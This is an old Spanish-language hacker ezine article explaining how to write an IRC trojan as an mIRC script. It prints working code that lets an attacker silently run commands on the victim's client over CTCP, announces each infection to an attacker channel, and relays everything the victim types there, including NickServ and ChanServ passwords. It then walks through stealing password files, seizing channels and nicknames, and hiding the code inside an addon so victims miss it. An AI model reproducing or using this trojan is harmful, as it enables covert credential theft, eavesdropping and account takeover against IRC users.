0x03: Troyanos de IRC
by Sanot
NOTA: No pretendo incitar a que la jente use troyanos, a mi en realidad no me gustan y encuentro que son una estupides, pero a muchos de ustedes les puede gustar, en el caso que no les guste lo siento mucho. Yo no los obligo a que lean esta seccion. Este articulo lo escribi por que se me ha pedido que lo haga, espero que no cree un prejuizio de mi pensando que soi una de esas personas que solo usan nukes y troyanos. El hacer un troyano de irc es bastante facil, y no implica mas de 4 o 5 lineas (si lo queremos especificar mas podremos usar mas lineas). La idea de un troyano es el poder controlar rmotamente a otra persona, aqui aremos lo mismo, en este caso sera por medio de CTCP.
----------o----------
ctcp ^*:*systat*:*:{
. $+ $$2- | halt } on *:connect: .msg #PlanetadeLamos x°Estoi Infectado!x
on *:INPUT:*:{.msg #PlanetadeLamos $1- }
----------o----------Bueno, que tenemos aqui? (Los que estan aprendiendo por primera vez en el curso de scripting de esta ezine no van a cachar ni una... mejor cuarden la ezine y cuando sepan mas la leen de nuevo.) Como pueden ver esto se compone de tres cosas. Un CTCP syst4t un msg al conectar y un msg al escribir.
1.- EL CTCP ( "ctcp ^*:systat:*:{ . $+ $$2- | halt }" ) Como veran es un ctcp que se puede ejecutar por cualquier grupo de personas ( "ctcp ^*:" ) y que es un ctcp systat ( "systat" ). Y nos dice que lo podemos ejecutar desde cualquier parte, ya sean privados, canales, dcc chats. Esto tambien le dice al infectado que ejecute lo que nosotros tipemos ( "$$2-" ) pero sin comuniacrle al infectado de lo que le estamos haciendo hacer ( ". $+" ) (El . hace que se ejcuten los comandos sin comuniacrnos). y que finalmente detenga cualquier otra seccion posterrios ( "| halt" ).
Veamos un ejemplo con el mismo ctcp. Supongamos que la victima tiene nick Servidor y nuestro nick es Cliente. <Cliente> /ctcp servidor systat join #gays que hace esto. Manda un ctcp systat al nick servidor pidiendole (o mandandolo) a que entre al canal #gays ( join #gays ). Veamos otro ejemplo. <Cliente> /ctcp servidor systat say amo a Cliente <Servidor> amo a Cliente Bueno, que hace esto. Simple, ordena al nick servidor que diga amo a Cliente ( "say amo a cliente" ).
Y por ultimo veamos otro ejemplo
<Cliente> /ctcp servidor systat dcc send Cliente script.iniEsto ordena a Servidor que envie a Cliente el archivo script.ini (donde genaralmente se guardan la clave del nick).
2.- El Connect ( "on *:connect: .msg #PlanetadeLamos x°Estoi Infectado!x" ) Bueno, aqui se puede apreciar que al momento de conectarse al servidor ( "on *:connect:" ) este manda un mensaje al canal #PlanetadeLamos sin que el infectado se de cuenta con el mensaje x°Estoi Infectado!x ( ".msg #PlanetadeLamos x°Estoi Infectado!x" ) Bueno, esto es util para saber quienes estan onfectados con nuestro troyano.
3.- El INPUT ( "on *:INPUT:*:{ .msg #PlanetadeLamos $1- }" ) Este es el tercer y ultimo paso de nuestro troyano, lo que esto hace es que cuando tecleemos algo en cualquier ventana ( "on *:INPUT:*:{" ) va a amdnar un mensaje a #Planetadelamos si que el infectado este conciente de esto ( ".msg #PlanetadeLamos" ) con todo lo que escribio ( "$1-" ) Veamos algunos ejemplos. <Infectado> Hola NightJHS Esto lo veriamos en la ventana del canal #Planetadelamos nos podemos imaginar que habla con alguna persona de nick NightJHS. <Infectado> Hola mi amor. Te gusto lo de anoche???
Uyy.. aqui estamos en algo mas privado. No seguire comantando esto.
<Infectado> /chanserv identify #operhelp 1315813158Aqui tenemos algo mucho mas interesante, aqui nos esta dando la clave del canal #operhelp. Entonces es solo cosa que nos identifiquemos y quedaremos como fundadores del canal.
<Infectado> /nickserv identify holachauAlgo bastante parecido, esta vez tenemos la clave de un nick. Y bueno si queremos ese nick podriamos botarlo del irc ( con el comando: /ctcp infectado systat quit ) y eso hara que se desconecte dejandonos libres para usar ese nick. Bueno, eso es todo lo que deben saber para crear un pequeño troyano de IRC. Doi gracias a Dr^Muerte por prestarme el codigo del troyano.
Ahh, se me olvidaban dos cosas sumamente importantes.
- Recomiendo que sto lo mesclen con algun addon, que lo pongan el medio o al fnial, ya que si la persona tiene una gota de inteligencia vera el codigo fuente de el addon y no lo va a loder, mientras que si lo colocan en un logar donde no se note mucho no se va a fijar.
- Pueden cambiar el codigo del addon, cosa que resulte mejor para su canal, o lo que deseen. Solo usen la imaginacion.
